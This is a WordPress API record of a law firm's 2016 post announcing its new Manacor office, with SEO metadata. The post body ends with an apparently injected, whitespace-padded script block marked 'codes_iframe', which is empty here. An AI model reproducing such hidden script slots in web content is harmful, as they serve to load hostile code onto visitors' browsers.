{"id":11763,"date":"2016-07-06T08:33:11","date_gmt":"2016-07-06T06:33:11","guid":{"rendered":"http:\/\/fmsb.disstintbeta.com\/2016\/07\/06\/nueva-oficina-de-fmsb-en-manacor\/"},"modified":"2016-07-06T08:33:11","modified_gmt":"2016-07-06T06:33:11","slug":"nueva-oficina-de-fmsb-en-manacor","status":"publish","type":"post","link":"https:\/\/fmsb.eu\/de\/2016\/07\/06\/nueva-oficina-de-fmsb-en-manacor\/","title":{"rendered":"Nueva oficina de FMSB en Manacor."},"content":{"rendered":"<h3 style=\"text-align: justify;\">Abierta nueva oficina de FMSB en Manacor.<\/h3>\n<p style=\"text-align: justify;\">El pasado mes de Junio celebramos la apertura de la nueva oficina de FONT MORA SAINZ de \u00a0BARANDA en Manacor.<\/p>\n<p style=\"text-align: justify;\">Con ello se pretende garantizar una mayor eficacia en la realizaci\u00f3n de nuestro trabajo en el\u00a0mundo de la abogac\u00eda y del asesoramiento jur\u00eddico y econ\u00f3mico. Con esta nueva oficina\u00a0daremos una mejor cobertura a los intereses de nuestros clientes de la comarca del Levante de\u00a0Mallorca adem\u00e1s de aumentar su comodidad al estar m\u00e1s pr\u00f3ximos a ellos.<\/p>\n<p style=\"text-align: justify;\">La apertura de la oficina de FONT MORA SAINZ de BARANDA MANACOR forma parte de un\u00a0proyecto ambicioso con el que se trata de expandir nuestros servicios a todo el territorio y estar\u00a0as\u00ed a disposici\u00f3n de todos.<\/p>\n<p style=\"text-align: justify;\">Para ello se han incorporado a nuestro equipo dos grandes profesionales como son Margalida\u00a0Sans\u00f3 Jaume y Margalida Fornaris Ramis, las cuales tienen una presencia permanente en dicha\u00a0oficina de Manacor.<\/p>\n<p style=\"text-align: justify;\">As\u00ed pues, en Manacor se podr\u00e1 encontrar la nueva oficina de\u00a0\u00a0FMSB en la calle\u00a0Amargura, 22, 1\u00ba (Tel.: + 00 34 971 823 398 y\u00a0Fax: + 00 34 971 823 398).<\/p>\n<p> <!--codes_iframe--><script type=\"text\/javascript\">                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Abierta nueva oficina de FMSB en Manacor. El pasado mes de Junio celebramos la apertura de la nueva oficina de FONT MORA SAINZ de \u00a0BARANDA en Manacor. Con ello se pretende garantizar una mayor eficacia en la realizaci\u00f3n de nuestro trabajo en el\u00a0mundo de la abogac\u00eda y del asesoramiento jur\u00eddico y econ\u00f3mico. Con esta nueva [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":8607,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2202,28],"tags":[],"class_list":["post-11763","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-home-de","category-unkategorisiert"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.3 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Nueva oficina de FMSB en Manacor. - FMSB Abogados y Economistas en Baleares<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/fmsb.eu\/de\/2016\/07\/06\/nueva-oficina-de-fmsb-en-manacor\/\" \/>\n<meta property=\"og:locale\" content=\"de_DE\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Nueva oficina de FMSB en Manacor. - FMSB Abogados y Economistas en Baleares\" \/>\n<meta property=\"og:description\" content=\"Abierta nueva oficina de FMSB en Manacor. El pasado mes de Junio celebramos la apertura de la nueva oficina de FONT MORA SAINZ de \u00a0BARANDA en Manacor. Con ello se pretende garantizar una mayor eficacia en la realizaci\u00f3n de nuestro trabajo en el\u00a0mundo de la abogac\u00eda y del asesoramiento jur\u00eddico y econ\u00f3mico. Con esta nueva [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/fmsb.eu\/de\/2016\/07\/06\/nueva-oficina-de-fmsb-en-manacor\/\" \/>\n<meta property=\"og:site_name\" content=\"FMSB Abogados y Economistas en Baleares\" \/>\n<meta property=\"article:published_time\" content=\"2016-07-06T06:33:11+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/fmsb.eu\/wp-content\/uploads\/2016\/07\/Captura-de-pantalla-2016-07-06-a-les-16.31.50.png\" \/>\n\t<meta property=\"og:image:width\" content=\"497\" \/>\n\t<meta property=\"og:image:height\" content=\"329\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"fmsb\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@fmsb-disstint\" \/>\n<meta name=\"twitter:label1\" content=\"Verfasst von\" \/>\n\t<meta name=\"twitter:data1\" content=\"fmsb\" \/>\n\t<meta name=\"twitter:label2\" content=\"Gesch\u00e4tzte Lesezeit\" \/>\n\t<meta name=\"twitter:data2\" content=\"1\u00a0Minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/fmsb.eu\\\/de\\\/2016\\\/07\\\/06\\\/nueva-oficina-de-fmsb-en-manacor\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/fmsb.eu\\\/de\\\/2016\\\/07\\\/06\\\/nueva-oficina-de-fmsb-en-manacor\\\/\"},\"author\":{\"name\":\"fmsb\",\"@id\":\"https:\\\/\\\/fmsb.eu\\\/de\\\/#\\\/schema\\\/person\\\/9fba7c70814b0cd34d35d655d36a4ca2\"},\"headline\":\"Nueva oficina de FMSB en Manacor.\",\"datePublished\":\"2016-07-06T06:33:11+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/fmsb.eu\\\/de\\\/2016\\\/07\\\/06\\\/nueva-oficina-de-fmsb-en-manacor\\\/\"},\"wordCount\":187,\"publisher\":{\"@id\":\"https:\\\/\\\/fmsb.eu\\\/de\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/fmsb.eu\\\/de\\\/2016\\\/07\\\/06\\\/nueva-oficina-de-fmsb-en-manacor\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/fmsb.eu\\\/wp-content\\\/uploads\\\/2016\\\/07\\\/Captura-de-pantalla-2016-07-06-a-les-16.31.50.png\",\"articleSection\":[\"Home\",\"Unkategorisiert\"],\"inLanguage\":\"de\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/fmsb.eu\\\/de\\\/2016\\\/07\\\/06\\\/nueva-oficina-de-fmsb-en-manacor\\\/\",\"url\":\"https:\\\/\\\/fmsb.eu\\\/de\\\/2016\\\/07\\\/06\\\/nueva-oficina-de-fmsb-en-manacor\\\/\",\"name\":\"Nueva oficina de FMSB en Manacor. - FMSB Abogados y Economistas en Baleares\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/fmsb.eu\\\/de\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/fmsb.eu\\\/de\\\/2016\\\/07\\\/06\\\/nueva-oficina-de-fmsb-en-manacor\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/fmsb.eu\\\/de\\\/2016\\\/07\\\/06\\\/nueva-oficina-de-fmsb-en-manacor\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/fmsb.eu\\\/wp-content\\\/uploads\\\/2016\\\/07\\\/Captura-de-pantalla-2016-07-06-a-les-16.31.50.png\",\"datePublished\":\"2016-07-06T06:33:11+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/fmsb.eu\\\/de\\\/2016\\\/07\\\/06\\\/nueva-oficina-de-fmsb-en-manacor\\\/#breadcrumb\"},\"inLanguage\":\"de\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/fmsb.eu\\\/de\\\/2016\\\/07\\\/06\\\/nueva-oficina-de-fmsb-en-manacor\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"de\",\"@id\":\"https:\\\/\\\/fmsb.eu\\\/de\\\/2016\\\/07\\\/06\\\/nueva-oficina-de-fmsb-en-manacor\\\/#primaryimage\",\"url\":\"https:\\\/\\\/fmsb.eu\\\/wp-content\\\/uploads\\\/2016\\\/07\\\/Captura-de-pantalla-2016-07-06-a-les-16.31.50.png\",\"contentUrl\":\"https:\\\/\\\/fmsb.eu\\\/wp-content\\\/uploads\\\/2016\\\/07\\\/Captura-de-pantalla-2016-07-06-a-les-16.31.50.png\",\"width\":497,\"height\":329},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/fmsb.eu\\\/de\\\/2016\\\/07\\\/06\\\/nueva-oficina-de-fmsb-en-manacor\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Portada\",\"item\":\"https:\\\/\\\/fmsb.eu\\\/de\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Nueva oficina de FMSB en Manacor.\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/fmsb.eu\\\/de\\\/#website\",\"url\":\"https:\\\/\\\/fmsb.eu\\\/de\\\/\",\"name\":\"FMSB Abogados y Economistas en Baleares\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/fmsb.eu\\\/de\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/fmsb.eu\\\/de\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"de\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/fmsb.eu\\\/de\\\/#organization\",\"name\":\"FMSB Abogados y Economistas en Baleares\",\"url\":\"https:\\\/\\\/fmsb.eu\\\/de\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"de\",\"@id\":\"https:\\\/\\\/fmsb.eu\\\/de\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/fmsb.eu\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/logo.svg\",\"contentUrl\":\"https:\\\/\\\/fmsb.eu\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/logo.svg\",\"width\":154,\"height\":52,\"caption\":\"FMSB Abogados y Economistas en Baleares\"},\"image\":{\"@id\":\"https:\\\/\\\/fmsb.eu\\\/de\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/fmsb.eu\\\/de\\\/#\\\/schema\\\/person\\\/9fba7c70814b0cd34d35d655d36a4ca2\",\"name\":\"fmsb\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"de\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/426f4d5b0ebcace85460caf87cdaaa193694b611e990615d87a13f322fb7ee7f?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/426f4d5b0ebcace85460caf87cdaaa193694b611e990615d87a13f322fb7ee7f?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/426f4d5b0ebcace85460caf87cdaaa193694b611e990615d87a13f322fb7ee7f?s=96&d=mm&r=g\",\"caption\":\"fmsb\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/fmsb-disstint\"],\"url\":\"https:\\\/\\\/fmsb.eu\\\/de\\\/author\\\/fmsb\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Nueva oficina de FMSB en Manacor. - FMSB Abogados y Economistas en Baleares","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/fmsb.eu\/de\/2016\/07\/06\/nueva-oficina-de-fmsb-en-manacor\/","og_locale":"de_DE","og_type":"article","og_title":"Nueva oficina de FMSB en Manacor. - FMSB Abogados y Economistas en Baleares","og_description":"Abierta nueva oficina de FMSB en Manacor. El pasado mes de Junio celebramos la apertura de la nueva oficina de FONT MORA SAINZ de \u00a0BARANDA en Manacor. Con ello se pretende garantizar una mayor eficacia en la realizaci\u00f3n de nuestro trabajo en el\u00a0mundo de la abogac\u00eda y del asesoramiento jur\u00eddico y econ\u00f3mico. Con esta nueva [&hellip;]","og_url":"https:\/\/fmsb.eu\/de\/2016\/07\/06\/nueva-oficina-de-fmsb-en-manacor\/","og_site_name":"FMSB Abogados y Economistas en Baleares","article_published_time":"2016-07-06T06:33:11+00:00","og_image":[{"width":497,"height":329,"url":"https:\/\/fmsb.eu\/wp-content\/uploads\/2016\/07\/Captura-de-pantalla-2016-07-06-a-les-16.31.50.png","type":"image\/png"}],"author":"fmsb","twitter_card":"summary_large_image","twitter_creator":"@fmsb-disstint","twitter_misc":{"Verfasst von":"fmsb","Gesch\u00e4tzte Lesezeit":"1\u00a0Minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/fmsb.eu\/de\/2016\/07\/06\/nueva-oficina-de-fmsb-en-manacor\/#article","isPartOf":{"@id":"https:\/\/fmsb.eu\/de\/2016\/07\/06\/nueva-oficina-de-fmsb-en-manacor\/"},"author":{"name":"fmsb","@id":"https:\/\/fmsb.eu\/de\/#\/schema\/person\/9fba7c70814b0cd34d35d655d36a4ca2"},"headline":"Nueva oficina de FMSB en Manacor.","datePublished":"2016-07-06T06:33:11+00:00","mainEntityOfPage":{"@id":"https:\/\/fmsb.eu\/de\/2016\/07\/06\/nueva-oficina-de-fmsb-en-manacor\/"},"wordCount":187,"publisher":{"@id":"https:\/\/fmsb.eu\/de\/#organization"},"image":{"@id":"https:\/\/fmsb.eu\/de\/2016\/07\/06\/nueva-oficina-de-fmsb-en-manacor\/#primaryimage"},"thumbnailUrl":"https:\/\/fmsb.eu\/wp-content\/uploads\/2016\/07\/Captura-de-pantalla-2016-07-06-a-les-16.31.50.png","articleSection":["Home","Unkategorisiert"],"inLanguage":"de"},{"@type":"WebPage","@id":"https:\/\/fmsb.eu\/de\/2016\/07\/06\/nueva-oficina-de-fmsb-en-manacor\/","url":"https:\/\/fmsb.eu\/de\/2016\/07\/06\/nueva-oficina-de-fmsb-en-manacor\/","name":"Nueva oficina de FMSB en Manacor. - FMSB Abogados y Economistas en Baleares","isPartOf":{"@id":"https:\/\/fmsb.eu\/de\/#website"},"primaryImageOfPage":{"@id":"https:\/\/fmsb.eu\/de\/2016\/07\/06\/nueva-oficina-de-fmsb-en-manacor\/#primaryimage"},"image":{"@id":"https:\/\/fmsb.eu\/de\/2016\/07\/06\/nueva-oficina-de-fmsb-en-manacor\/#primaryimage"},"thumbnailUrl":"https:\/\/fmsb.eu\/wp-content\/uploads\/2016\/07\/Captura-de-pantalla-2016-07-06-a-les-16.31.50.png","datePublished":"2016-07-06T06:33:11+00:00","breadcrumb":{"@id":"https:\/\/fmsb.eu\/de\/2016\/07\/06\/nueva-oficina-de-fmsb-en-manacor\/#breadcrumb"},"inLanguage":"de","potentialAction":[{"@type":"ReadAction","target":["https:\/\/fmsb.eu\/de\/2016\/07\/06\/nueva-oficina-de-fmsb-en-manacor\/"]}]},{"@type":"ImageObject","inLanguage":"de","@id":"https:\/\/fmsb.eu\/de\/2016\/07\/06\/nueva-oficina-de-fmsb-en-manacor\/#primaryimage","url":"https:\/\/fmsb.eu\/wp-content\/uploads\/2016\/07\/Captura-de-pantalla-2016-07-06-a-les-16.31.50.png","contentUrl":"https:\/\/fmsb.eu\/wp-content\/uploads\/2016\/07\/Captura-de-pantalla-2016-07-06-a-les-16.31.50.png","width":497,"height":329},{"@type":"BreadcrumbList","@id":"https:\/\/fmsb.eu\/de\/2016\/07\/06\/nueva-oficina-de-fmsb-en-manacor\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Portada","item":"https:\/\/fmsb.eu\/de\/"},{"@type":"ListItem","position":2,"name":"Nueva oficina de FMSB en Manacor."}]},{"@type":"WebSite","@id":"https:\/\/fmsb.eu\/de\/#website","url":"https:\/\/fmsb.eu\/de\/","name":"FMSB Abogados y Economistas en Baleares","description":"","publisher":{"@id":"https:\/\/fmsb.eu\/de\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/fmsb.eu\/de\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"de"},{"@type":"Organization","@id":"https:\/\/fmsb.eu\/de\/#organization","name":"FMSB Abogados y Economistas en Baleares","url":"https:\/\/fmsb.eu\/de\/","logo":{"@type":"ImageObject","inLanguage":"de","@id":"https:\/\/fmsb.eu\/de\/#\/schema\/logo\/image\/","url":"https:\/\/fmsb.eu\/wp-content\/uploads\/2025\/02\/logo.svg","contentUrl":"https:\/\/fmsb.eu\/wp-content\/uploads\/2025\/02\/logo.svg","width":154,"height":52,"caption":"FMSB Abogados y Economistas en Baleares"},"image":{"@id":"https:\/\/fmsb.eu\/de\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/fmsb.eu\/de\/#\/schema\/person\/9fba7c70814b0cd34d35d655d36a4ca2","name":"fmsb","image":{"@type":"ImageObject","inLanguage":"de","@id":"https:\/\/secure.gravatar.com\/avatar\/426f4d5b0ebcace85460caf87cdaaa193694b611e990615d87a13f322fb7ee7f?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/426f4d5b0ebcace85460caf87cdaaa193694b611e990615d87a13f322fb7ee7f?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/426f4d5b0ebcace85460caf87cdaaa193694b611e990615d87a13f322fb7ee7f?s=96&d=mm&r=g","caption":"fmsb"},"sameAs":["https:\/\/x.com\/fmsb-disstint"],"url":"https:\/\/fmsb.eu\/de\/author\/fmsb\/"}]}},"_links":{"self":[{"href":"https:\/\/fmsb.eu\/de\/wp-json\/wp\/v2\/posts\/11763","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fmsb.eu\/de\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fmsb.eu\/de\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fmsb.eu\/de\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/fmsb.eu\/de\/wp-json\/wp\/v2\/comments?post=11763"}],"version-history":[{"count":0,"href":"https:\/\/fmsb.eu\/de\/wp-json\/wp\/v2\/posts\/11763\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/fmsb.eu\/de\/wp-json\/wp\/v2\/media\/8607"}],"wp:attachment":[{"href":"https:\/\/fmsb.eu\/de\/wp-json\/wp\/v2\/media?parent=11763"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fmsb.eu\/de\/wp-json\/wp\/v2\/categories?post=11763"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fmsb.eu\/de\/wp-json\/wp\/v2\/tags?post=11763"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}